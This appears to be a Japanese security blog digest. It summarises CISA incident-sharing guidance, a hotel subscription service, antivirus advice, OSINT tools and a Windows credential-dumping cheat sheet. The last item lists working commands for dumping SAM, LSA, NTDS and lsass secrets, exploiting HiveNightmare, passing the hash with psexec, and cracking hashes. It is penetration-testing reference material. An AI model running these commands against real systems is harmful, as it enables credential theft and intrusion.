インシデント共有に関するガイダンス～共有すべき重要な要素は？～ / Guidance on Sharing Cyber Incident Information

CISAのSharing Cyber Event Information Fact Sheetは、異常なサイバーインシデントやアクティビティについて、何を共有すべきか、誰が共有すべきか、どのように共有すべきかについての明確なガイダンスと情報をステークホルダーに提供しています。 

CISAは、パートナーからのこれらの情報を利用して、敵対者がどのように米国のネットワークや重要インフラ分野を狙っているかについての共通認識を構築しています。この情報によって重要な情報格差が埋まり、CISAは攻撃に苦しむ被害者にリソースを迅速に配備して支援を提供し、セクターを超えて寄せられる報告を分析して傾向を把握し、その情報をネットワーク防御者と迅速に共有して他の潜在的被害者に警告を発することができるようになるのです。

■共有すべき重要な要素ベスト10

1. 事故発生日時 
2. 事故発生場所 
3. 観察された活動の種類 
4. 事象の詳細な説明 
5. 影響を受けた人またはシステムの数 
6. 会社名・団体名 
7. 連絡先詳細 
8. 事象の重大性 
9. 重要インフラ部門がわかっている場合
10. 他に知らせた人

出典：Guidance on Sharing Cyber Incident Information:

定額制回遊型住み替えサービス「TsugiTsugi」、対象宿泊施設拡大

東急は、定額制回遊型住み替えサービス「TsugiTsugi（ツギツギ）」の対象宿泊施設を全国の173軒のホテルに拡大した。

新たに、ドーミーイン、御宿 野乃、共立リゾート、JRイン、相鉄フレッサインの全国のチェーンホテルと、ホテル日航ノースランド帯広を追加した。これにより、全国37都道府県で展開することになる。

これまでは30泊限定で展開していたものの、13泊の「ライトプラン」を新設し、自宅とホテルの多拠点生活など、ライフスタイルに合わせた利用を可能とする。いずれのプランも同伴者1名まで無料。5月と6月利用分の利用者の募集を3月23日正午から開始しており、340名限定で受け付ける。

東急は2021年4月から、グループが運営する全国17都道府県の39軒のホテルを対象に「ツギツギ」のサービスを開始している。

出典：定額制回遊型住み替えサービス「TsugiTsugi」、対象宿泊施設拡大

ウイルス対策ソフトはどれが良い？

 

Windows10からWindows Defenderというウイルス対策ソフトが同梱されており、「これでいいんじゃね？」っていう声や相談をちらほら聞く。

実際のところ、どうなのだろうか？

答えは個人と法人で少し状況が異なる。

まず、個人については「OK」

無料なので、ウイルス検知の性能に不安を感じるかもしれないが、検知能力は有料のウイルス対策ソフトとそん色ない。

ちなみにウイルス対策ソフトの検知能力については下記のサイトで確認することができる。

AV-TEST

次に法人について。

法人は正直ケースバイケースとなる。

何がケースバイケースかというと、管理機能の要否で状況が変わってくるからである。

個人事業主や従業員数名クラスの会社はIT担当やセキュリティ担当なんて置けないので、必然的にウイルス対策ソフトの管理機能は不要となる⇒Windows DefenderでOK

一方、IT担当やセキュリティ担当を設置してしっかり管理しようとすると、管理機能の提供が無いWindows Defenderでは不都合が出てくる。

管理機能が無いとパターンファイルが更新されていない端末、ウイルス対策ソフトのバージョンが古いままの端末、ウイルス検知したものの事後処理が必要な端末の洗い出しができないのである。

ある程度の組織規模で、IT管理やセキュリティ管理に対して相応の責任を求められる企業においては、管理機能付きの有償のウイルス対策ソフトが必要となる。

週刊OSINT #2022-13 / WEEK IN OSINT #2022-13

短い更新ですが、共有したい素敵なものを見つけました。

ツールの使い方について、今号もそれを継続することにしました。ここではたくさんのことを共有していますが、それは最終手段です。なぜかというと、自分のすることすべてを理解する必要があるからです。もし、自分の発見を「売る」ことができなければ、また、ある情報をどこで見つけたかを明確に説明できなければ、他の誰かが再現したり、それを検証したりすることはできないでしょう。

• Using Tools - Part 2
• ICIJ Datashare
• UK Aerial Archive
• Reddit JSON
• RedditMetis

小技: Using Tools - Part 2

前号は、ツールを使うことの危険性についてお話しました。OSINTは画像プロバイダ、ソーシャルメディアプラットフォーム、IT関連情報のサイトなど、多くの外部プラットフォームに依存しているにもかかわらず、再びツールについて話したいと思います。なぜなら、毎号このニュースレターで紹介しているツールは、時にある種の欠点を伴うからです。その一つが、このツイートで明らかになりました。

すべての調査を手作業で行う場合、インターネットのどの部分にアクセスしたかを正確に把握することができます。しかし、調査においてサードパーティのツールに依存する場合、バックエンドがどのように設定され、どのソースに触れているか、どのようなデータセットが利用できるかが分からないと、調査中にすべての手段を使い切ったと言えるでしょうか？ある出来事、事件、人物について、非難または免責の証拠をすべて見つけたと、どうやって確認できるでしょうか？これが、私が調査のほとんどを手作業で行う理由の一つでもある。自分がどこにいて、何をしたかを知るだけでなく、自分がやったことを他の人が再現できるようにしたいのです。

話し合うための質問：ツールに関して問題があったことはありますか？例えば、結果が不完全であった、信頼できない、再現が不可能であったなどでしょうか？このエピソードを投稿したTwitterのスレッドに返信するか、The OSINT Curious Discordサーバーに行き、あなたの経験を共有するのはどうでしょう。

ツール: ICIJ Datashare

ツールの話をした直後に、最近偶然見つけたものを紹介します。まだじっくり見る時間がないのですが、大量のドキュメントを扱うときにはとても期待できそうです。ICIJ Datashareを使えば、大量のドキュメントを迅速かつ簡単にインデックス化し、検索することができます。ユーザーマニュアルによると、NLPを使った検索をする以外は、インターネットに接続する必要はないそうです。

サイト: UK Aerial Archive

先日、Steven 'Nixintel' Harrisが、歴史的な画像を豊富に含むサイトを紹介してくれました。40年代にRAFが撮影した写真から、現代の高解像度オブリガードまで、イギリスの多くのランドマークから撮影されている。時事問題や歴史問題で航空写真が必要な時には、素晴らしいサイトです。

サイト: RedditMetis

Discordサーバーで#redditチャンネルを見ていたら、@ohshint_さんのコメントにも、Redditツールへの便利なリンクがたくさんありました。そのうちのひとつが私の目に留まりました。RedditMetisです。このツールは、過去1000件の投稿やコメントを分析することで、あらゆるRedditユーザーを洞察することができます。

オマケ: It's a Passion

出典：Week in OSINT #2022-13

中国OSINTツールリンク「OSINT CHINE」 / OSINT CHINE created by Pangar-ban.

企業、税関、司法事例、土地証明書、公共交通機関など、中国に関する多くの貴重な情報資源があります。

OSINT CHINE - start.me

中国語ベースのOSINTツールリンク集 / OSINT开源情报与侦察工具

OSINTの諜報・偵察ツールに関するオンラインリソースのスタートページで、牧狼人により作成されました。

OSINT开源情报与侦察工具 - start.me

Windowsのクレデンシャルダンプ / Windows — Credentials Dumping | by Karol Mazurek

Windowsの認証情報をダンプするための最新のツールやテクニックを紹介するチートシートです。

初めに

この記事では、Windowsのクレデンシャルダンプのための現在のツール＆テクニックを紹介します。非常に短く、チートシートスタイルで書かれています。主な目的は、コマンドを1つの場所に集約し、評価中にコピー＆ペーストできるようにすることです。この短い記事のボーナスとして、最後にはJohn The RipperとHashcatを使ってWindowsのハッシュをクラックするためのコマンドを見つけることができます。

ツール

1. LaZagne
2. Impacket
3. CrackMapExec
4. HiveNightmare (CVE-2021–36934)
5. Meterpreter — credential_collector
6. Meterpreter — smart_hashdump

コマンド

• よく使うソフトのパスワード検索:

laZagne.exe all

• 特定のファイルタイプに含まれるテキスト「パスワード」の手動検索:

findstr /si 'password' *.txt *.xml *.docx

• ターゲット上でエージェントを実行せずにリモートでハッシュダンプ:

impacket-secretsdump $domain/$user:$pass@$ip

• CMEを用いた様々なハッシュダンプ:
  (ユーザがローカルアカウントの場合、-local-auth オプションを使用します。)

crackmapexec smb $ip -u $user -p $pass --sam

crackmapexec smb $ip -u $user -p $pass --lsa

crackmapexec smb $ip -u $user -p $pass --ntds

crackmapexec smb $ip -u $user -p $pass --ntds vss

crackmapexec smb $ip -u $user -p $pass -M lsassy

crackmapexec smb $ip -u $user -p $pass -M wireless

crackmapexec smb $ip -u $user -p $pass -M handlekatz

crackmapexec smb $ip -u $user -p $pass -M nanodump

crackmapexec smb $ip -u $user -p $pass -M procdump

crackmapexec smb $ip -u $user -p $pass --laps

crackmapexec smb $ip -u $user -p $pass -M gpp_password

デフォルトの管理者名がadministratorでない場合は、オプションの後にユーザー名を追加します: --laps <name>.

• GPPの復号化:

gpp-decrypt $encrypted_password

• Meterpreterモジュール:
  (まず、lsass.exeプロセスに移行するのがよいでしょう)

migrate <id of lsass.exe>

run post/windows/gather/credentials/credential_collector

run post/windows/gather/smart_hashdump

CVE-2021-36934 (別名SeriousSam)

非管理者として任意のレジストリハイブを読み取ることができるようにするエクスプロイトです。

• SAM、SECURITY、SYSTEMのハイブダンプの取得:

.\HiveNightmare.exe

• これら3つのファイルをダウンロードし、ハッシュをダンプします。:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local

• PSHtechniqueを使用してリモートシステムにログインします。:

impacket-psexec -hashes $hash $user@$ip

クラッキング

• LM

john --format=lm hash.txt

hashcat -m 3000 -a 3 hash.txt

• NTML

john --format=nt hash.txt

hashcat -m 1000 -a 3 hash.txt

• NTLMv1

john --format=netntlm hash.txt

hashcat -m 5500 -a 3 hash.txt

• NTLMv2

john --format=netntlmv2 hash.txt

hashcat -m 5600 -a 0 hash.txt

• Kerberos 5 TGS

john --format=krb5tgs hash.txt --wordlist=rockyou.txt

hashcat -m 13100 -a 0 hash.txt rockyou.txt

• Kerberos ASREP

john --format=krb5asrep hash.txt --wordlist=rockyou.txt

hashcat -m18200 hash.txt rockyou.txt

出典：Windows — Credentials Dumping | by Karol Mazurek